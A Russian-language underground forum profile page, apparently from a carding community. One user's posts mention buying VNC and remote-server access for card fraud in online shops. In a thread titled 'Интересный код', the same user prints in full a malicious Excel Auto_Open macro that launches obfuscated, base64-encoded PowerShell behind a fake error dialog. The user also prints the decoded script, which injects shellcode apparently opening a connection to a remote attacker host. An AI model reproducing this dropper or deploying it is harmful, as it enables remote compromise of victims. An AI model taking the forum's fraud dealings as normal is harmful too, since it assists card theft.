Перейти к содержанию

Wunschpunsch

Проверенный продавец
  • Публикаций

    7
  • Зарегистрирован

  • Посещение

Репутация

0 Neutral

Информация о Wunschpunsch

  • Звание
    Rank №1
  1. История работы с Тосиком Закинул за 1 VNC USA под FL, объяснил заранее что нужно под вбив в шопы, он согласился, через 40 мин. скинул мне vnc на котором невозможно работать напрочь по скорости, заменил, тоже самое. Попросил заменить на дедик с домашкой по темже параметрам, скинул мне дедик Сингапура, попросил манибек, сидит молчит, охуенно он разбирается бро, спасибо за твой отзыв. не рекомендую, проебете время, оформлять блек из-за 15$ не буду, по факту кидок Хреново, что так вышло. У меня с ним проблем не было, я в недоумении что за херня происходит. Удалю свой отзыв, чтоб людей не смущать, убедил.
  2. Интересный код.

    Всем спасибо огромное за участие и внимание к вопросу. Если у кого то есть кардинально новые мысли на этот счет - буду рад почитать.
  3. Интересный код.

    emoto, сейчас уже понятно. Это я к тому, что на случай того что он его включит когда-нибудь. Да и проверял я на дедике в момент когда мне его отправили (то есть по логике адрес должен был быть активным). Самое смешное, что при открытие экселя вылезает предупреждение о том, что макросы по дефолту выключены, и их нужно включить. Странный метод атаки на самом деле. Это же надо что бы жертва ткнула эксель, а потом ткнула в настройки и включила макросы... Не проще было бы склеить с чем-нибудь и криптануть? Загадка... krasniy_miner, понятно, спасибо большое за ответ! :)
  4. Интересный код.

    Когда я прогнал xlsm файл на вирустотале - он выдал, что это лоадер как раз. Этой инфы мне не хватило :( Но, видимо, больше и не узнать, да? Может запустить на ВМ или дедике и посмотреть что будет? На дедике я пробовал, нихрена не произошло. Видимо, создатель видит отстук и потом принимает решение что грузить - правильно мыслю? А может быть такое, что этот лоадер не грузит что то жертве, а наоборот - скачивает с компа жертвы инфу?
  5. Интересный код.

    Спасибо большое за ответ! То что он там что то с повершеллом мутит - до этого я смог дойти, но вот что именно эта зараза хочет? Ворует куки? Бекдор? Крипт? (возможно я тупой, не смейся надо мной пожалуйста)
  6. Интересный код.

    Всем привет. Заголовок для привлечения внимания, код может для кого-то оказаться и не совсем интересным. История такая: Хотели мне как-то плохие люди заслать некудю гадость, но я, конечно же, не повелся. А вот любопытство свое утихомирить все никак не могу, что же там такого гадкого было в итоге. Изначально это был xlsm файл, в котором был макрос следующего содержания: Спойлер Sub Auto_Open()Dim eLGnzH eLGnzH = " /w 1 /C ""s''v vL -;s''v HEQ e''c;s''v IT ((g''v vL).value.toString()+(g''v HEQ).value.toString());" & "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " (g''v IT).value.toString() ('JABiAHgAIAA9ACAAJwAkAFIAbwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBl AHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0A GUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByAC AAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGY AbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMA dAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0Ac AB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQ BhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQB iAHUAdAB" _ & "lAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByAC AAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0 AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4A dABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0Ac wB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcg BuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQB pAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHkAVgAgAD0AIABB AGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFIAbwAgA C0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAE YAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwB" _ & "bAEIAeQB0AGUAWwBdAF0AJABIAHYAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAAyAC wAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACw AMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwA MAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAM AB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMA B4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB 4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4 ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAAwAHgANQAyACwAMAB4A DUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4AD MAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB" _ & "4ADQAOAAsADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5AC wAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACw AMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwA MAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwAxACwAM AB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMA B4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB 4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4 ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4A DAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AG QAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB" _ & "4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiAC wAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACw AMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwA MAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwACwAM AB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADcAMwAsADAAeAAzADIALAAwAHgANQBmACwAMA B4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB 4AGYAZgAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4 ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4A DIAOQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AD YAYQAsADAAeAAwAGEALAAwAHgANgA4ACwAMAB4ADUAZQAsADAAeAAwAGEALAAwAHgAYgAxACwAMAB" _ & "4AGIANQAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4ADAAMAAsADAAeAAxAGUALAAwAHgANABkAC wAMAB4ADgAOQAsADAAeABlADYALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACw AMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwA MAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA3ACwAM AB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5ACwAMA B4AGEANQAsADAAeAA3ADQALAAwAHgANgAxACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB 4AGMAMAAsADAAeAA3ADQALAAwAHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4 ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4A DUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4AD AANAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB" _ & "4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4AGIALAAwAHgAMwA2AC wAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMA'+'AwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAH gANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHg AOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA1ADMALAAwAHgA NQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZ gBmACwAMAB4AGQANQAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADIAOQAsADAAeABjADYALAAwAHgANw A1ACwAMAB4AGUAZQAsADAAeABjADMAOwAkAHkASwAgAD0AIAAwAHgAMQAwADEAMAA7AGkAZgAgACgAJAB IAHYALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAxADAAKQB7ACQAeQBLACAAPQAgACQASAB2 AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBiAD0AJAB5AFYAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjA CgA" _ & "MAAsADAAeAAxADAAMQAwACwAJAB5AEsALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABSAHEAPQA wADsAJABSAHEAIAAtAGwAZQAgACgAJABIAHYALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAUgBxACsAKwAp ACAAewAkAHkAVgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAYgAuAFQAbwBJA G4AdAAzADIAKAApACsAJABSAHEAKQAsACAAJABIAHYAWwAkAFIAcQBdACwAIAAxACkAfQA7ACQAeQBWAD oAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAGIALAAwACwAMAAsADAAKQA7AGY AbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAHMARgAgAD0A IABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAa QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQ BjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABiAHgAKQApADsAJABxAGIASwAgAD0AIAAiAC0AZQB jACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsA" _ & "JABPAGkAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQB zAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw AG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQATwBpACAAJABxAGIASwAgACQAcwBGA CIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAHEAYgBLAC AAJABzAEYAIgA7AH0A')""" Dim grEabMr grEabMr = "S" & "h" & "e" & "l" & "l" Dim wHvnC wHvnC = "W" & "S" & "c" & "r" & "i" & "p" & "t" Dim OciyknfPOg OciyknfPOg = wHvnC & "." & grEabMr Dim guHbcJN Dim GZufZEbrJFncmBY Set guHbcJN = VBA.CreateObject(OciyknfPOg) Dim ggtQfGzHpPoK ggtQfGzHpPoK = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " " GZufZEbrJFncmBY = guHbcJN.Run(ggtQfGzHpPoK & eLGnzH, 0, False) Dim title As String title = "Microsoft Office Corrupt Application (Compatibility Mode)" Dim msg As String Dim intResponse As Integer msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]" intResponse = MsgBox(msg, 16, title) Cells(101, 1).Value = 99 Application.Quit End Sub Путем колоссальных усилий (нет) было выведано, что код зашифрован. Один умный дядя помог расшифровать его, но все мы люди и можем ошибаться, поэтому было решено задать вопрос местным Да-Винчи. Вот, собственно, код после расшифровки: Спойлер $bx = '$Ro = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$yV = Add-Type -memberDefinition $Ro -Name "Win32" -namespace Win32Functions -passthru;[byte[]];[byte[]]$Hv = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0 x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x 10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x0 1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1 ,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4, 0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0 x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x 5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x3 2,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4 ,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x5e,0x0a,0xb1,0xb5, 0x68,0x02,0x00,0x1e,0x4d,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0 xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0x ff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xf f,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36 ,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff, 0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0 xc3,0x29,0xc6,0x75,0xee,0xc3;$yK = 0x1010;if ($Hv.Length -gt 0x1010){$yK = $Hv.Length};$qb=$yV::VirtualAlloc(0,0x1010,$yK,0x40);for ($Rq=0;$Rq -le ($Hv.Length-1);$Rq++) {$yV::memset([intPtr]($qb.ToInt32()+$Rq), $Hv[$Rq], 1)};$yV::CreateThread(0,0,$qb,0,0,0);for (;){Start-Sleep 60};';$sF = [system.Convert]::ToBase64String([system.Text.Encoding]::Unicode.GetBytes($bx));$qbK = "-ec ";if([intPtr]::Size -eq 8){$Oi = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $Oi $qbK $sF"}else{;iex "& powershell $qbK $sF";} Некоторые мысли на тему того "что эта зараза предположительно может делать" - у меня есть. Хотелось бы свериться с более понимающими в данном вопросе людьми. Алсо, злоумышленник, который рассылает эту дрянь - русскоязычный как минимум. Так что привет тебе, друг, если читаешь это сообщение ;) Всем заранее благодарочка!
×